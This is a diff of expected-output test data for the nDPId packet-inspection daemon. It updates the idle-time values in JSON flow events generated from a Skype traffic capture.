00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1431970689672,"flow_last_seen":1431970694329,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2899,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51294,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 